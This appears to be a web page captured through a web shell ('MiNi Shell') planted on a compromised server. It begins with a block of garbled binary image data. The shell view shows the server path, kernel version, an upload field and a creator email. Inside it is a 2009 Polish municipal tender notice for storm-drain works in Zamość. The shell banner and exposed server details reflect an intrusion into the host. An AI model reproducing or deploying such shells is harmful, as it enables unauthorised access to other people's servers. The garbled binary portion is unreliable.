JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27101-N-2009.html

<p class="kh_header"><b>Zamość: Budowa kanalizacji deszczowej w ulicy Chabrowa i w ulicy Kopernika 
w Zamościu</b><br>
<b>Numer ogłoszenia: 27101 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Grodzkich  w Zamościu , ul. Partyzantów 61, 22-400 Zamość, woj. lubelskie, tel. 084 6383198, faks 084 6396189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdg.zamosc.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji deszczowej w ulicy Chabrowa i w ulicy Kopernika 
w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3)Opis przedmiotu zamówienia,
   
Przedmiotem zamówienia są roboty budowlane polegające na budowie kanalizacji deszczowej w ulicy Chabrowa i w ulicy Kopernika w Zamościu. 

Przedmiot zamówienia podzielono na części:

Część nr 1: Budowa kanalizacji deszczowej w ulicy Chabrowa 
Zakres robót do wykonania :
1.Roboty ziemne ; 
- wykopy  770,2 m3,
- umocnienie ścian wykopów palami szalunkowymi  871m2,
2.Kanał deszczowy i przykanaliki ;
- geosiatka separacyjna, podłoża pod kanały,
- kanały z rur  : dn 160 mm - 38,6 m ; dn 300mm - 263,4m,
- studnie żelbetowe  fi 1200 mm - 7 szt.
-  studzienki ściekowe uliczne żelb. fi 500 -szt. 10.

Część nr 2: Budowa kanalizacji deszczowej w ulicy Kopernika .

 Zakres robót do wykonania :
1.Roboty ziemne ; 
- wykopy  1173,2 m3,
 - umocnienie ścian wykopów palami szalunkowymi  1175,6m2,
- drenaż rurowy 250 m,  
2.Kanał deszczowy i przykanaliki ;
- geosiatka separacyjna, podłoża pod kanały,
- kanały z rur  : dn 160 mm - 38,6 m ; dn 300mm - 263,4m,
- studnie rewizyjne żelbetowe   - 6 szt.
-studzienki ściekowe uliczne żelb.  -szt. 12,
- przepompownia - szt.1,
- wykonanie zasilania nn do przepompowni, -16 m,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.40-8, 45.23.14.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium o wartości: 
Część nr 1: Budowa kanalizacji deszczowej w ulicy Chabrowa .
Wadium : 3 300,00 zł ( słownie : trzy tysiące trzysta zł ),
Część nr 2: Budowa kanalizacji deszczowej w ulicy Kopernika.
Wadium : 5 900,00 zł ( słownie : pięć tysięcy dziewięćset  zł ),<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:

1. W postępowaniu przetargowym mogą uczestniczyć wykonawcy , którzy udokumentują poprzez zaświadczenia i oświadczenia , że spełniają następujące warunki : 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ;
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;   
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;                         
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia .
2. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia publicznego Wykonawcy są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3. Wykonawca musi dysponować osobą uprawnioną do pełnienia funkcji kierownika budowy, posiadają uprawnienia budowlane branży sanitarnej oraz aktualne ubezpieczenie od odpowiedzialności cywilnej poświadczone przez odpowiedni organ samorządu zawodowego. 
4. Wykonawca obowiązany jest wykazać się wykonaniem w ciągu ostatnich 5 lat przed  wszczęciem postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym   okresie minimum 3 robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia i o wartości nie mniejszej niż wartość przedkładanej oferty , z podaniem daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
5.Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - niespełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Uzupełnienie wymaganych dokumentów nie jest możliwe po upływie terminu składania ofert, chyba, że ich nie uzupełnienie skutkowałoby unieważnieniem postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów , jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu;
W celu potwierdzenia ważności oferty i spełnienia warunków podmiotowych Wykonawca załączy do oferty następujące dokumenty i oświadczenia :  
1) wypełniony formularz ofertowy [wg załączonego druku]; Zał. Nr 1. 
2) kosztorys ofertowy [wypełniony wg zał.]; Zał. Nr 2. 
3)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, - Zał. Nr 3.
4) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy Pzp [na formularzu ofertowym]; Zał.Nr 4. 
5) aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt.4-8 ustawy Pzp [wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]; Zał. Nr 5.
6) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Pzp[wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]; Zał. Nr 6.
7) aktualne zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert]; Zał. Nr 7.
8) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert]; Zał. Nr 8.
9)  rachunek zysków i strat , w przypadku wykonawców niezobowiązanych do sporządzania rachunku zysków i strat  innych dokumentów , określających obroty, zyski oraz zobowiązania i należności, z których wynika, że wykonawca ma możliwość wykonania przedmiotu zamówienia - [ za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres]; Zał. Nr 9.
10) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej , w którym wykonawca posiada rachunek , potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  , wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, Zał. Nr 10.
11) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności; Zał. Nr 11.
12) wykazu wykonanych robót budowlanych w okresie pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; min. 3 robót; odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia , z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających , że roboty te zostały wykonane należycie; [wypełniony wg zał.]; Załącznik Nr. 12 .
13) wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich czynności.[wypełniony wg zał.]; Załącznik Nr. 13 .
14)wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń , którymi dysponuje lub może dysponować wykonawca -[wypełniony wg zał. ];Załącznik Nr 14.
14 a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń , jeżeli w wykazie o którym mowa w pkt.14 , wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował .
15) wypełniony i  zaakceptowany przez wykonawcę wzór umowy - [wypełniony wg zał.]; Załącznik Nr 15.
16) ksero wpłaty wadium, wniesionego w wybranej formie;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdg.zamosc.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać w siedzibie Zarządu Dróg Grodzkich w Zamościu ul. Partyzantów 61, 22-400 Zamość, w godzinach od 7:00-15:00 lub za zaliczeniem pocztowym. 
Cena SIWZ - 20,00 PLN za kserokopię.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2009 godzina 10:00, miejsce: Oferty należy złożyć w siedzibie Zamawiającego , w Zarządzie Dróg Grodzkich w Zamościu, ul. Partyzantów 61, do dnia 17.02.2009r  do godz. 10:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa kanalizacji deszczowej w ulicy Chabrowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1: Budowa kanalizacji deszczowej w ulicy Chabrowa 
Zakres robót do wykonania :
1.Roboty ziemne ; 
- wykopy  770,2 m3,
- umocnienie ścian wykopów palami szalunkowymi  871m2,
2.Kanał deszczowy i przykanaliki ;
- geosiatka separacyjna, podłoża pod kanały,
- kanały z rur  : dn 160 mm - 38,6 m ; dn 300mm - 263,4m,
- studnie żelbetowe  fi 1200 mm - 7 szt.
-  studzienki ściekowe uliczne żelb. fi 500 -szt. 10..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.40-8, 45.23.14.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa kanalizacji deszczowej w ulicy Kopernika.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2: Budowa kanalizacji deszczowej w ulicy Kopernika .

 Zakres robót do wykonania :
1. Roboty ziemne ; 
- wykopy  1173,2 m3,
- umocnienie ścian wykopów palami szalunkowymi  1175,6m2,
- drenaż rurowy 250 m,  
2. Kanał deszczowy i przykanaliki ;
- geosiatka separacyjna, podłoża pod kanały,
- kanały z rur  : dn 160 mm - 38,6 m ; dn 300mm - 263,4m,
- studnie rewizyjne żelbetowe   - 6 szt.
-studzienki ściekowe uliczne żelb.  -szt. 12,
- przepompownia - szt.1
- wykonanie zasilania nn do przepompowni, -16 m,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.40-8, 45.23.14.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com